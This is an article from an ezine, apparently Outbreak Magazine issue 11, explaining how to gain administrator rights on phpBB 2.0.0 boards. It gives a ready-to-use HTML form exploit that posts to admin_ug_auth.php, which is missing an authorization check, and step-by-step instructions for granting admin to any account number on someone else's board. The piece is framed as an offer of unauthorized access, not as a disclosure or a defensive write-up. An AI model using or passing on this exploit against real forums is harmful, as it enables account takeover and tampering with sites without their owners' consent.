°Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #11 - Article 7 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'


Want admin on phpBB 2.0.0?
--------------------------

PhpBB is a popular free bulletin board package available at phpbb.com, 
which google reports as having 100+ implementations at the time of 
writing this article.

A coding error exists in the admin_ug_auth.php script (used to set 
permissions), which means that although admin rights are needed to view the 
page, anyone can post data back to it ”no questions asked”.  Therefore, 
if you already know what kind of response the board is looking for, you 
can go straight ahead and tell it directly that you want to give admin 
rights to a specific account.  If you do not already have an account on 
the board in question, you will have to create one.

One way to test this would be to set up a board yourself, (which you 
have admin rights over) and edit a copy of the form used to update 
permissions, but for people who don’t want to goto those lengths, I’ve 
provided some sample code below:

<html>
<head>
</head>
<body>

<form method="post" 
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>

Before using the sample code you must first find out two bits of 
information which are both easily obtained.  The base directory of the board, 
(usually something like http://www.mydomain.com/phpBB2), which is found 
by taking off index.php from the main page URL, and the user number of 
the account you wish to give admin.  To do this go to the forums member 
list page, click your username, then note down the number shown at the 
right end of the URL you are now at.  (if no users have been deleted 
from the board, then the number next to your username on the members list 
page under the “#” column will also be your true user number, but play 
it safe and use the one in the URL).  When you have all the 
information, ensure you log out from the board.  (otherwise, you will get a 
permissions error later on, as StankDawg discovered).

Now edit the form action in the sample code above to be the full 
location of the boards base directory plus the location of the admin script.  
Usually, this is in a subdirectory from the base directory called 
/admin/.  Your result should look something like this: 
action=http://www.domain_name/board_directory/admin/admin_ug_auth.php. Save 
the changes to your page when you are done.  

Next just call it in a local browser window, typing the user number you 
obtained into the user number box on screen, and hit submit.  On your 
next log in, there will be a link at the bottom of every board page 
saying "Go to Administration Panel" and additional options will appear on 
screen when you are viewing a specific thread to enable you to edit, 
delete, lock individual posts/threads etc.


by nick84
http://rootsecure.net
http://www.stankdawg.com